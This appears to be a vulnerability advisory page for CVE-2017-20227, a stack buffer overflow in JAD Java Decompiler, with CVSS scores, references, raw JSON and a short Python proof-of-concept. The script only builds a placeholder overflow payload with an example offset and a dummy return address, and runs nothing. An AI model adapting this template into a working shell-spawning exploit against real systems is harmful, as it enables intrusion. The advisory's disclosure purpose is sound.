Security Vulnerability Report
CVE-2017-20227 CVSS 9.8 CRITICAL

Published: 2026-03-28 12:16:02
Last Modified: 2026-04-08 19:37:27

Description

JAD Java Decompiler 1.5.8e-1kali1 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying overly long input that exceeds buffer boundaries. Attackers can craft malicious input passed to the jad command to overflow the stack and execute a return-oriented programming chain that spawns a shell.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:varaneckas:jad_java_decompiler:1.5.8e-1kali1:*:*:*:*:*:*:* - VULNERABLE
JAD Java Decompiler <= 1.5.8e-1kali1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python
# PoC for CVE-2017-20227 (JAD Stack Buffer Overflow)
# This script generates a malicious file to trigger the overflow.
import struct

# Offset to overwrite EIP (Example value, adjust based on specific binary analysis)
offset = 412

# ROP chain to spawn shell (Example placeholders)
# Byte strings are used so the concatenation with struct.pack() output is valid.
rop_chain = b"A" * offset
rop_chain += struct.pack('<I', 0xdeadbeef)  # Overwrite EIP with gadget address
rop_chain += b"C" * 100  # Padding / Shellcode placeholder

# Create a malicious .class file with a long name or pass argument
# Assuming the crash happens via command line argument
payload = rop_chain

print("[+] Generating payload...")
print("[+] Payload length: {}".format(len(payload)))

# Command to simulate crash (requires vulnerable jad binary)
# print("Usage: jad " + payload)

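References

http://www.varaneckas.com/jad/ - Product
https://www.exploit-db.com/exploits/42255 - Exploit, VDB Entry
https://www.vulncheck.com/advisories/jad-8e-1kali1-stack-based-buffer-overflow - Third Party Advisory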

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20227", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:01.993", "lastModified": "2026-04-08T19:37:26.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JAD Java Decompiler 1.5.8e-1kali1 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying overly long input that exceeds buffer boundaries. Attackers can craft malicious input passed to the jad command to overflow the stack and execute a return-oriented programming chain that spawns a shell."}, {"lang": "es", "value": "JAD Java Decompiler 1.5.8e-1kali1 y versiones anteriores contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a los atacantes ejecutar código arbitrario al proporcionar una entrada excesivamente larga que excede los límites del búfer. Los atacantes pueden crear una entrada maliciosa pasada al comando jad para desbordar la pila y ejecutar una cadena de programación orientada a retorno que genera un shell."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": 
"NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:varaneckas:jad_java_decompiler:1.5.8e-1kali1:*:*:*:*:*:*:*", "matchCriteriaId": "2E369DAD-6CD8-49AE-83F2-0CED1FEE51E1"}]}]}], "references": [{"url": "http://www.varaneckas.com/jad/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/42255", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/jad-8e-1kali1-stack-based-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}